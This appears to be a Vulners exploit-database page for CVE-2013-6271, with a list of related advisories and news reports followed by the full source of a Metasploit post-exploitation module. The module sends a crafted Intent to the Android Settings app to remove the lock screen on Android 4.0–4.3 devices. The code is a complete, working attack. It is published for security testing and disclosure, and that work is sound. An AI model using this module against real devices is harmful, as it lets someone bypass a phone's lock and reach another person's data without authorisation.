| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2013-6271 | 29 May 201815:50 | – | circl | |
| CVE-2013-6271 | 14 Dec 201320:00 | – | cve | |
| CVE-2013-6271 | 14 Dec 201320:00 | – | cvelist | |
| CVE-2013-6271 | 14 Dec 201320:55 | – | nvd | |
| Design/Logic Flaw | 14 Dec 201320:55 | – | prion | |
| Vulnerability in Android 4.3 allows apps to Remove Device Locks, POC app released | 2 Dec 201317:12 | – | thn | |
| Vulnerability in Android 4.3 allows apps to Remove Device Locks, POC app released | 2 Dec 201306:12 | – | thn | |
| Bug Allows Apps to Bypass Android Security Locks | 2 Dec 201310:34 | – | threatpost |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
Rank = NormalRanking
include Msf::Post::Common
include Msf::Post::Android::System
def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Android Settings Remove Device Locks (4.0-4.3)',
'Description' => %q{
This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.
Any unprivileged app can exploit this vulnerability to remove the lockscreen.
A logic flaw / design error exists in the settings application that allows an Intent from any
application to clear the screen lock. The user may see that the Settings application has crashed,
and the phone can then be unlocked by a swipe.
This vulnerability was patched in Android 4.4.
},
'License' => MSF_LICENSE,
'Author' => [
'CureSec', # discovery
'timwr' # metasploit module
],
'References' => [
[ 'CVE', '2013-6271' ],
[ 'URL', 'http://blog.curesec.com/article/blog/26.html' ],
[ 'URL', 'http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf' ]
],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Platform' => 'android',
'DisclosureDate' => '2013-10-11',
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
android_*
]
}
}
}
)
)
end
def is_version_compat?
build_prop = get_build_prop
# Sometimes cmd_exec fails to cat build_prop, so the #get_build_prop method returns
# empty.
if build_prop.empty?
fail_with(Failure::Unknown, 'Failed to retrieve build.prop, you might need to try again.')
end
android_version = Rex::Version.new(build_prop['ro.build.version.release'])
if android_version <= Rex::Version.new('4.3') && android_version >= Rex::Version.new('4.0')
return true
end
false
end
def run
unless is_version_compat?
print_error('This module is only compatible with Android versions 4.0 to 4.3')
return
end
result = session.android.activity_start('intent:#Intent;launchFlags=0x8000;component=com.android.settings/.ChooseLockGeneric;i.lockscreen.password_type=0;B.confirm_credentials=false;end')
if result.nil?
print_good('Intent started, the lock screen should now be a dud.')
print_good('Go ahead and manually swipe or provide any pin/password/pattern to continue.')
else
print_error("The Intent could not be started: #{result}")
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation